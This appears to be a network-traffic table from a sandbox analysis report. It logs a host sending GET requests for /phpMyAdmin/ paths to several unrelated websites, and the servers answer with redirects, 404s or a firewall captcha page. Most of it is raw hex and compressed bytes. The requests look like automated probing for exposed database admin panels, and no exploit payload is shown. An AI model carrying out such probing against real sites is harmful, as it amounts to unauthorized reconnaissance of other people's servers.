Feb 21, 2024 00:26:10.726378918 CET	1276	IN	Data Raw: 5a 54 6f 6d 2b 43 35 70 6e 6e 30 5a 74 5a 4f 73 63 53 62 64 54 51 5a 49 5a 49 6a 7a 4e 47 71 33 6a 5a 65 59 56 58 71 62 44 42 4b 37 7a 4f 50 76 37 4e 6d 78 7a 6d 4d 43 6f 36 79 78 47 4f 70 71 4a 4c 78 51 45 50 50 38 65 62 6b 68 32 78 6a 78 50 73 Data Ascii: ZTom+C5pnn0ZtZOscSbdTQZIZIjzNGq3jZeYVXqbDBK7zOPv7NmxzmMCo6yxGOpqJLxQEPP8ebkh2xjxPso8Vpyed4bWtGDod5nbfYx2tE9IjIcwqDOQxCLgjqhrjJapxQj5aykZ/KjJyp8vYw2jOkioWHg6QaitbobouivfRYdGlwB0//RiIvIqLJ/al9rsfi5oavS3VijivkmceYKJ2jlOzsy3jzHBrGuPR1YpMFFrB1bJ8us
Feb 21, 2024 00:26:10.726421118 CET	1276	IN	Data Raw: 4b 4b 62 77 45 6d 55 72 39 49 52 64 38 6c 67 73 49 66 2b 75 77 66 68 39 72 73 6a 2f 2f 30 34 7a 38 50 49 39 68 69 6d 33 61 35 51 30 68 41 67 43 76 57 73 45 6c 37 48 4c 47 6b 53 6d 38 78 79 37 34 61 37 52 49 71 32 52 79 68 4c 4c 71 34 76 45 4e 78 Data Ascii: KKbwEmUr9IRd8lgsIf+uwfh9rsj//04z8PI9him3a5Q0hAgCvWsEl7HLGkSm8xy74a7RIq2RyhLLq4vENxWg6Z8OdDn9k/pO8nvZ82B9HQH4suep5bgnoW/t4r+OSsr3KDZZ7hjnjRmpSwWGJ1Rz24Sgbupfrusw+nYg9brZp6vKv2bXV9yNo3FwRf1UmbhULadGRmefHVN7jCO1g05Yzd4bBIOYMOd3ZMy3lBovUZqA+G9Ip1V
Feb 21, 2024 00:26:10.726428986 CET	1276	IN	Data Raw: 57 39 51 6d 2b 6b 37 6b 35 75 59 62 72 75 30 61 4e 30 4a 59 59 52 78 4a 2b 54 49 52 2b 6e 4c 46 4d 64 4f 39 39 63 4f 75 69 69 68 38 46 49 79 73 53 4d 78 4b 7a 59 77 45 59 32 73 59 57 74 62 4f 4d 45 64 72 4b 62 50 65 78 6c 48 77 64 34 48 69 2f 67 Data Ascii: W9Qm+k7k5uYbru0aN0JYYRxJ+TIR+nLFMdO99cOuiih8FIysSMxKzYwEY2sYWtbOMEdrKbPexlHwd4Hi/ghbyIF/MSXuoOf52DHIoeT/J0/wJ3SqRpQnpexxt4N+/hvbyP9ztH3+MHTs4d3Mnd3MuDPMpjQmmVVVe7pmpu5KHLiejRfHs+PruYnKemd+nbnlzBbpT+/sSSBYiT///ekfH78UPEBWNubh73czs77OmucVf3h6/Pn
Feb 21, 2024 00:26:10.817230940 CET	1276	IN	Data Raw: 2f 71 55 5a 5a 48 77 6a 6f 6a 59 54 73 6a 59 66 6d 34 36 56 4d 69 5a 79 64 45 7a 72 5a 48 7a 71 5a 46 7a 72 5a 46 7a 6e 5a 45 7a 72 4b 52 73 33 7a 6b 72 44 74 79 6c 6f 75 63 37 59 36 63 35 53 4e 6e 32 63 68 5a 4c 72 37 35 4d 79 53 4d 55 44 65 44 Data Ascii: /qUZZHwjojYTsjYfm46VMiZydEzrZHzqZFzrZFznZEzrKRs3zkrDtylouc7Y6c5SNn2chZLr75MySMUDeDNMxk2kyDdtPEJJOKxLSMvRjTTD7cnRbuTgp3m8OV6eHKjHBlZrgyK1yZHa7MCVfmhivzwpWOcKUzXOkKV7rDlZ5wpTdc6QtX+sOVgfBjOPwohx9Tw4/28CMXfmTCj9bwoxZ+JOFHMfwYCj9K4ceU8KMt/MiGH+nwo

Session ID	Source IP	Source Port	Destination IP	Destination Port
204	192.168.2.6	58818	3.33.130.190	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:10.644617081 CET	172	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: cfgteam.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:10.741906881 CET	222	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:10 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://cfgteam.com/phpMyAdmin/ ETag: "65d0dd59-0"
Feb 21, 2024 00:26:10.947782993 CET	222	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:10 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://cfgteam.com/phpMyAdmin/ ETag: "65d0dd59-0"

Session ID	Source IP	Source Port	Destination IP	Destination Port
205	192.168.2.6	58809	185.230.63.186	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:10.647285938 CET	176	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: touktoukcie.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:10.791853905 CET	1286	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:10 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive x-wix-request-id: 1708471570.6871477704572112308 Age: 0 Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=42 X-Seen-By: pmHZlB45NPy7b1VBAukQrewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLg+F4RAy97FgBhKEMuS3Uv05XEckg9t2+jA6cQOj+vGJ,2d58ifebGbosy5xc+FRalr4A1m7kKRXi8+FkxeRlAe1B1EZ589CNM0S0ZfiAm0M2iZTn0AJpZgJ+dSNFbL8SDA==,2UNV7KOq4oGjA5+PKsX47Ad3BAkeAb9lWxcyN70+/DFYgeUJqUXtid+86vZww+nL,Av/qWudICkhRTCN8pPYKz67T02HXAs3+PXof1ish5pM=,HFwuyehutl8tT21go4rzKQuGWFn2wMQWjizQyxww5Ro=,/j+AjfLiOiE0Vc9NsP8sK3wn3HKfNyHsngqdvH35wynwHI026nY8X82AVI4uc6ntz725C8t8ZYCuhGMAdFHN2Q== Vary: Accept-Encoding X-Content-Type-Options: nosniff Content-Encoding: gzip Transfer-Encoding: chunked Data Raw: 34 34 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 56 dd 6f db 36 10 7f cf 5f c1 e8 45 2d 10 8a 96 9b cc 6e 26 05 e8 b2 0c cb cb 50 6c 28 b0 a1 28 0a 5a 3a 5b 4c 28 52 25 a9 d8 46 d7 ff bd 77 92 ec 39 71 b0 c6 89 1f 6c f3 c8 fb f8 dd 37 63 d9 31 e7 8c 71 7e 71 74 94 1d 97 b6 08 eb 06 58 15 6a 7d 81 67 ce 8f 18 7e e8 36 23 1a 33 0b 2e 9b 26 8f 96 6a 75 e5 9c 75 ef e5 02 fc bb a6 89 e8 01 c8 f2 02 df 67 35 04 c9 8c ac 21 8f ee 14 2c 1b eb 42 c4 0a 6b 02 98 40 ac 65 a8 f2 12 ee 54 01 bc 3b 9c 28 a3 82 92 9a fb 42 6a c8 d3 13 56 cb 95 aa db fa 3f 42 eb c1 75 27 39 c3 17 c6 a2 be 8d a2 a2 92 ce 03 0a 6e c3 9c 4f 77 2e aa 10 1a 0e 5f 5a 75 97 47 7f f3 0f ef f8 a5 ad 1b 19 14 4a d8 31 e7 fa 2a 87 72 01 3d 5f 50 41 03 81 9c 29 53 e6 51 dc 20 bc cf 1d 31 66 ff b2 e0 a4 f1 5a 06 7c 9c 89 8e fa 10 6e 09 be 70 aa 09 ca 9a 1d 15 3b 36 1d e0 95 3d 2e 67 67 36 f8 1d b9 c6 a2 95 b0 3a 61 c6 ce ad d6 76 d9 b3 6c 03 4a a1 cb b4 32 b7 8c 82 9a 47 aa 46 38 a2 31 8b 88 55 0e e6 79 24 c4 72 b9 4c 30 96 49 61 6b 31 97 18 12 6b 12 fc 8a 98 03 9d 47 be c2 d0 15 6d 60 44 df 13 de 8b de 48 f2 01 5d 5b 24 8d 74 d2 07 eb 50 53 27 14 e3 46 81 f6 22 54 ca 95 1c af c3 5a cc 31 17 bc f8 1d f4 1d 20 8f ec ce bf c9 02 39 3c e2 eb 55 87 b5 06 5f 01 60 ea f4 d6 07 58 05 d1 3d 10 9d db 77 60 f6 96 ec f1 3d d5 34 74 00 6f da 99 56 85 48 93 49 fa 36 19 09 df a9 17 40 39 8e 46 63 92 0f a4 ce c4 fb fa 33 d1 67 7e 36 b3 e5 9a 69 69 16 79 04 18 7f Data Ascii: 444Vo6_E-n&Pl((Z:[L(R%Fw9ql7c1q~qtXj}g~6#3.&juug5!,Bk@eT;(BjV?Bu'9nOw._ZuGJ1*r=_PA)SQ 1fZ\|np;6=.gg6:avlJ2GF81Uy$rL0Iak1kGm`DH][$tPS'F"TZ1 9<U_`X=w`=4toVHI6@9Fc3g~6iiy
Feb 21, 2024 00:26:10.791886091 CET	629	IN	Data Raw: 4c 23 4a 7a 87 a1 01 97 47 db 7a b9 dc 12 99 f4 ac 53 41 65 74 19 9c c6 e0 6a e9 3d f2 6f 15 53 bd f5 b2 fa 9b af b1 07 14 5b 4a b7 e6 33 59 dc 2e 9c 6d 4d 19 9f 33 e5 ff da 5c fc b2 a5 7f 43 5b c9 53 1f d5 9c e9 c0 ae af d8 db 4f 48 e9 b3 94 79 Data Ascii: L#JzGzSAetj=oS[J3Y.mM3\C[SOHyWP:gW$E?mILrD/{OdaBlhB7_Zpkt:J1jHEQn0c7g%/q(K~b <~7_=*Z-5pA!OsnUn`>r

Session ID	Source IP	Source Port	Destination IP	Destination Port
206	192.168.2.6	58865	162.215.240.240	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:10.746670961 CET	181	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: wefttechnologies.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:10.965138912 CET	1286	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:10 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://wefttechnologies.com/wp-json/>; rel="https://api.w.org/" Upgrade: h2,h2c Connection: Upgrade Vary: Accept-Encoding Content-Encoding: gzip Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc b2 eb 76 dc c6 d5 2d fa 5b 7a 8a 12 72 b6 45 7e 21 d0 75 af 02 c5 96 b7 dd 76 3e 65 0f 2a c9 89 1c 66 6f 39 1e 1e 60 a3 ba 1b 36 1a e8 00 68 36 19 45 63 9c d7 38 af 77 9e e4 cc 2a a0 2f a4 28 89 b6 ec 24 4a cc c6 aa 75 99 73 cd 35 cf 9e c4 f1 59 eb a6 5d 51 57 64 5a 66 6d 3b 8e ae 0a b7 59 d5 4d 17 3d 8f e3 e7 8f cf 50 41 86 7f 67 79 71 45 8a 7c 1c b5 d3 a6 2e cb 78 5a 57 5d 56 54 ae 89 b6 bd ef 24 86 19 79 3d ed 6e 56 8e 2c ba 65 89 d8 ff 90 32 ab e6 e3 c8 55 f1 5f 5e 45 fe cd 65 f9 f3 c7 8f ce 96 ae cb c8 74 91 35 ad eb c6 d1 5f be f9 5d 6c a3 dd 7b 95 2d dd 01 43 e2 81 5c 85 ba 4d 91 77 8b 71 ee ae 8a a9 8b 43 70 42 8a aa e8 8a ac 8c db 69 56 ba 31 0b 53 ca a2 fa 91 34 ae 1c 47 ab a6 9e 15 a5 8b c8 a2 71 b3 71 b4 e8 ba 55 7b 3a 1a cd 97 ab 79 52 37 f3 d1 f5 ac 1a 31 df 14 36 0f e8 68 59 b9 a6 bb 19 47 f5 fc b4 ac fd d8 03 0a ae fa 1e 9b 90 d1 8e ec ad 72 bf fe 21 5f 77 d9 16 9d 3b 2c 0f bb 3d 6d ea cb ba 6b 9f ee 2a 9f 56 75 51 e5 ee fa 84 cc a0 6c bd 79 ea 3b d0 e2 cf f2 cd a2 68 89 1f 43 f0 5b af ba 62 59 fc c3 e5 64 53 74 0b d2 2d 1c f9 3f 75 d6 76 e4 d5 d7 7f 24 ab 72 3d 2f 2a 72 c5 59 62 49 4c b6 cb de f8 82 64 5a 2f 47 9b ba c9 57 8d 6b db 51 5f da 8e 5a 57 8f 88 bf de a3 b3 ae e8 4a f7 fc 4f d9 dc 91 aa ee 40 64 5d e5 98 f2 aa 9e 75 9b ac 71 e4 2b 77 e5 ca 7a b5 04 5f 32 a9 97 ab ac ba 21 ff 24 7f 75 b3 8e 7c e3 a6 8b aa 2e eb 79 e1 da b3 51 3f e8 5e 7d 7e aa 9c 7e d2 41 f5 27 93 7b 2f 92 d7 f7 7b 7f 9b 03 b4 9f 39 bc 9d 36 c5 aa 23 de 0a e3 28 5b ad ca 62 9a 75 45 5d 8d ca fc b7 3f b4 75 05 84 32 6b db 71 14 ee 02 df 2e dc 32 8b e7 4d b6 5a 44 cf df 44 ff 33 e0 5f 77 d1 e9 ce ad 7d 89 f7 6b 74 12 fd cf be f2 f4 5b 94 06 bb 9d 46 7f 75 97 af bc cd 90 2c f2 83 be 0d 18 76 07 04 83 07 7e b3 35 e5 49 b4 6e ca 8f 55 a3 2a a8 72 fa d3 d5 38 89 72 d7 6b 81 e5 31 e0 65 7d 59 94 8e 7c b1 5a dd 37 02 e5 ab da eb 5e 64 e5 17 d3 be e5 60 c5 57 2e 6b a6 8b 21 71 12 75 59 33 77 90 68 5f f0 75 d5 35 37 7f aa 8b aa eb 17 fb c6 2d 57 65 d6 b9 8f 2d f8 79 3b 7e d3 86 e1 df 77 ae 59 7e df 76 4d 51 cd df 46 6f 4f a2 bf af 5d 73 13 17 d5 6a ed 8f d1 b8 bf af 8b c6 e5 c4 eb 31 7e b7 25 7a fb dd 49 54 54 e7 59 35 5f c3 a6 e8 70 55 0c 6f bf fd ee ed d9 a8 d7 c1 bb e3 49 1c 93 11 f9 3f fe f4 e4 d5 d7 7f 24 ab 72 3d 2f aa 84 c4 f1 f3 c7 8f 1f 9f 95 45 f5 23 69 5c 09 e7 94 18 5e f9 0d ee b1 52 d3 b6 bf bd 5e 96 48 15 5d e9 7e ba 55 c9 67 4d f6 f7 75 fd 8c fc ce b9 3c 22 8b c6 cd c6 1f d6 69 86 c2 51 70 f8 bf 9c 23 6a 7c 6d fb 70 b2 d3 a1 e3 90 f5 f6 04 9b a2 ca eb 4d f2 fd 66 e5 96 f5 0f c5 2b d7 75 b8 5e 4b c6 e4 4d 74 99 b5 ee 2f 4d b9 f3 cc df 46 7f 1b b5 c9 26 a9 9b f9 df 46 c5 Data Ascii: 1faav-[zrE~!uv>efo9`6h6Ec8w/($Jus5Y]QWdZfm;YM=PAgyqE\|.xZW]VT$y=nV,e2U_^Eet5_]l{-C\MwqCpBiV1S4GqqU{:yR716hYGr!_w;,=mkVuQly;hC[bYdSt-?uv$r=/rYbILdZ/GWkQ_ZWJO@d]uq+wz_2!$u\|.yQ?^}~~A'{/{96#([buE]?u2kq.2MZDD3_w}kt[Fu,v~5InU*r8rk1e}Y\|Z7^d`W.k!quY3wh_u57-We-y;~wY~vMQFoO]sj1~%zITTY5_pUoI?$r=/E#i\^R^H]~UgMu<"iQp#j\|mpMf+u^KMt/MF&F
Feb 21, 2024 00:26:10.965188026 CET	1286	IN	Data Raw: 12 67 6d ff 86 e1 8d fb db 28 34 ff 6d c4 64 42 13 fa b7 91 e1 d7 86 ff 6d 04 ef b9 6b ef 96 64 05 47 9c 44 ed d5 fc e7 cd 43 63 98 86 df af fb 81 f8 f2 71 bd 6e a6 ce 1b 7f 5a 57 10 3a b4 0d f3 c3 f8 fb f4 c0 eb 0a 3e 9e 96 eb dc 03 fe d0 86 87 Data Ascii: gm(4mdBmkdGDCcqnZW:>['K+u"}oEKfE~uWsW9'u5>*N7WYC=;~57!no\+mW\|\eqvtYc^uuuGz?$mz;>~
Feb 21, 2024 00:26:10.965257883 CET	1286	IN	Data Raw: 99 cd 71 b8 71 e7 ad 7b 5f c7 d7 d7 53 b7 ea 7e 87 b2 fb 27 ee f3 77 66 1f 3f fb e4 79 4f 0e 2a 3c 51 6c fa d5 1f 5f fe d9 65 f9 cd f8 09 43 d4 f8 cf 49 56 96 97 d9 f4 c7 fd 19 8e df 1c 16 d2 b7 ef c8 7a fc 66 38 a5 bb 27 15 4c 7b 3f f9 7f fe f3 Data Ascii: qq{_S~'wf?yO*<Ql_eCIVzf8'L{?(z&NGv=wG0>>uf>?%f<uC:3MQ$!~(\|gF?>k"?P6.\<m?~T,eQPN<~(/U<)^!{
Feb 21, 2024 00:26:10.965270996 CET	1286	IN	Data Raw: 0e 99 1d d1 13 32 fc 3f e1 77 af b8 ed ce 9d 5b 61 13 e8 d9 ff 51 f4 9e 6e f9 be 6e fc 36 ab 3d f2 7d bd ef 45 ae d7 9d 77 65 7e bb 3d 16 db 19 5c a9 13 b2 ff c3 8e 4f 76 85 b7 31 d8 fb 10 a6 4d d1 7e 90 1d 3a df 9e 6e 16 ae 71 47 49 d1 c2 5c 37 Data Ascii: 2?w[aQnn6=}Ewe~=\Ov1M~:nqGI\7 Jw}fItf:!$YY7xS-K] C<ob7=?uU7CgJuW'rU7]VwO_W>_^P~u;Vuw sf<>x
Feb 21, 2024 00:26:10.965276003 CET	1286	IN	Data Raw: 9b 82 67 dd 2c 63 13 4f db f6 29 59 34 6e 36 7e ba e8 ba d5 e9 68 b4 71 b3 ae 73 d3 45 05 d5 e7 85 6b 93 69 bd 1c 81 90 6f c4 59 46 ab 72 3d 2f aa 76 74 7b d0 a8 a8 a6 e5 3a 77 78 6f db 9e 06 3a db f6 f3 2b d7 8c 55 62 12 95 b0 a7 c4 3b 37 1b 3f Data Ascii: g,cO)Y4n6~hqsEkioYFr=/vt{:wxo:+Ub;7?)}fu9]o\jB'^W]s5;Kd-p,jNd"~*l/d~J7U6v}]7q0dqmG?#?3n\rqyk_yV?}06\|pK
Feb 21, 2024 00:26:10.965348005 CET	1286	IN	Data Raw: db d5 cb b8 07 c4 5e ff 02 c8 76 55 16 5d 57 54 f3 7f 25 56 3c 75 65 d9 fe 2b 10 f7 7e fd 55 71 1a d7 ae e0 d5 e2 ca c5 08 0f 00 7b d7 8e 46 1f f2 ed e0 ec ff ae eb 39 d2 df 64 73 f2 32 ab b2 b9 6b 42 fa ac 9d 36 c5 aa 7b 7e 34 5b 57 53 df 74 b4 Data Ascii: ^vU]WT%V<ue+~Uq{F9ds2kB6{~4[WSt9O8~n~$u8zt-c\|t]M2gWYCf\|]bk?do<i0k(A$/<5O?Y9~g?$Y{SM]vf:~+z7d
Feb 21, 2024 00:26:10.965361118 CET	796	IN	Data Raw: 49 94 29 7f 27 2c 09 36 42 e2 59 61 c9 94 1a bf a4 31 d4 4e 64 ea 59 86 a5 a0 25 c6 80 bd 54 e1 ae c6 32 eb 63 4e b1 0d b7 89 b2 92 4d b6 79 18 59 a8 94 f9 bc b5 da 7a 47 e3 80 2a cc d7 42 12 ef 6c ca ec c4 e3 2b cb 09 d3 c1 c8 c4 d3 b3 c0 81 9f Data Ascii: I)',6BYa1NdY%T2cNMyYzG*Bl+}P51o0SA6@>ynhVJ~\[)gMP1o)DXYb6xGL%PSk;VP66A9nlq;aX%1^ML\|QE"T>VBx
Feb 21, 2024 00:26:10.965403080 CET	1286	IN	Data Raw: 31 66 61 30 0d 0a ec 0b 5f a6 25 b8 e1 97 29 e2 9f a5 f5 c3 71 ce db 21 38 93 a1 6b e2 b1 65 ca fa 58 32 e4 01 23 a4 8f 79 2a 55 88 61 2c 1f 53 93 ea 89 e7 0e 1f 78 a5 50 66 c3 2e cc e7 41 39 f5 52 40 63 2c 49 04 7c ca 95 df 1d 67 55 21 86 a1 75 Data Ascii: 1fa0_%)q!8keX2#y*Ua,SxPf.A9R@c,I\|gU!us02HcbOr?(q6Dg~Lm.cM]ed-/5br=?I%$]oMqB/2r>?a;I]^7-r
Feb 21, 2024 00:26:10.965416908 CET	1286	IN	Data Raw: 62 a6 e8 f6 31 c6 63 44 f2 ac cb e2 ae e8 4a 37 8e be 6a 8a 2b 6f 96 ff 6e ea 4d b7 88 1e b8 ef 4f 3a 43 de 43 c4 f3 00 31 8a b6 dc cb a2 ed 5e 38 10 7a 7e 9b 84 97 ff 61 34 1e a2 fa ae f8 27 db e7 2e ef e7 93 ba ea 60 0f f2 aa 6b b2 ce cd 6f 7e Data Ascii: b1cDJ7j+onMO:CC1^8z~a4'.`ko~?u^MV^:pvt}Ee+yF(/PuXyI\jWY<+_X$fm*{@OyH_a7yIv?Nn\|t
Feb 21, 2024 00:26:10.965462923 CET	1286	IN	Data Raw: 22 d7 cb b2 6a c7 d1 a2 eb 56 a7 a3 d1 66 b3 49 36 22 a9 9b f9 88 53 4a fd 0e 77 b0 1e 9d ad b2 6e 41 f2 71 f4 52 26 fe 96 90 c6 5e a8 c4 2a 25 e5 0b 5c 9a 1b a9 cd 05 b3 2f 86 f4 eb 97 3c 61 ca 70 4e 64 c2 52 2d 60 2d 45 51 34 84 f8 11 12 31 2c Data Ascii: "jVfI6"SJwnAqR&^*%\/<apNdR-`-EQ41,}Z&:TkcI-;j24qfjhon'zV&0b_UhbXK/B-epg&wU2Id<<KIV61J+x#++i0[C>e/I
Feb 21, 2024 00:26:11.139890909 CET	1286	IN	Data Raw: 05 81 74 5f c7 44 df 07 d7 ec e7 60 2e bc b9 3d 43 00 b6 d4 06 26 29 0a 7a 6a da db ce 42 2c 3d 90 e7 61 19 cf 28 6c 67 95 1c d6 b5 fd fe fe 96 5e 10 e4 f6 0f bd 64 76 b2 7b 08 a2 8a 5e e5 30 23 c8 6e f6 20 e1 2e 2a 9d ec 58 84 cb c1 7f 3b 9e e1 Data Ascii: t_D`.=C&)zjB,=a(lg^dv{^0#n .*X;l?goNUlb:SjClSAI\|,H 5'^w!VI]We;Uv{QMd/Jw(\|XL,4:9jbjjb~o

Session ID	Source IP	Source Port	Destination IP	Destination Port
207	192.168.2.6	58866	86.107.32.28	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:10.758572102 CET	174	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: collevilca.it Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:10.947283030 CET	1286	IN	HTTP/1.1 403 Forbidden Content-Type: text/html Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Server: BitNinja Captcha Server Date: Tue, 20 Feb 2024 23:26:10 GMT Content-Length: 13695 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6a 6f 6f 6d 6c 61 2c 20 4a 6f 6f 6d 6c 61 2c 20 6a 6f 6f 6d 6c 61 20 31 2e 35 2c 20 77 6f 72 64 70 72 65 73 73 20 32 2e 35 2c 20 44 72 75 70 61 6c 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 20 31 2e 35 20 2d 20 4f 70 65 6e 20 53 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 57 6f 72 64 50 72 65 73 73 20 32 2e 35 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 57 61 69 74 69 6e 67 20 66 6f 72 20 74 68 65 20 72 65 64 69 72 65 63 74 69 72 6f 6e 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 70 61 6e 20 7b 63 6f 6c 6f 72 3a 20 23 38 37 38 37 38 37 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 74 3b 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 63 6f 6c 6f 72 3a 20 23 38 37 38 37 38 37 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 74 3b 20 74 65 78 74 2d 61 6c 69 Data Ascii: <!DOCTYPE HTML><html lang="en-US"> <head> <meta charset="UTF-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta name="robots" content="noindex, nofollow" /><meta name="keywords" content="joomla, Joomla, joomla 1.5, wordpress 2.5, Drupal" /><meta name="description" content="Joomla!" /><meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /><meta name="generator" content="WordPress 2.5" /> <meta http-equiv="Content-Type" content="text/html;charset=UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" /> <title>Waiting for the redirectiron...</title> <style type="text/css"> body {background-color: #ffffff; font-family: "Helvetica Neue", Helvetica,Arial,sans-serif;} html, body {width: 100%; height: 100%; margin: 0; padding: 0;} span {color: #878787; font-size: 12pt; text-align: center;} h1 {color: #878787; font-size: 18pt; text-ali
Feb 21, 2024 00:26:10.947485924 CET	1286	IN	Data Raw: 67 6e 3a 20 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 6c 69 6e 6b 20 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 30 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 73 6b 2d 63 69 72 63 6c 65 20 7b 6d 61 72 67 69 6e 3a Data Ascii: gn: center;} .link {margin-top: 40px;} .sk-circle {margin: 80px auto;width: 100px;height: 100px;position: relative;} .sk-circle .sk-child {width: 100%;height: 100%;position: absolute;left: 0;top: 0;}
